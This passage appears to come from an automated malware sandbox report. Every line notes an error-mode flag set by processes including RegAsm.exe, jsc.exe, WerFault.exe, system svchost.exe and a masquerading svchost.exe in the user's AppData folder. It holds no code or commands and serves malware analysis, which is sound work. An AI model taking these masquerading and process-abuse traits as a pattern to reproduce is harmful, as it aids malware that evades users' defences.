Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
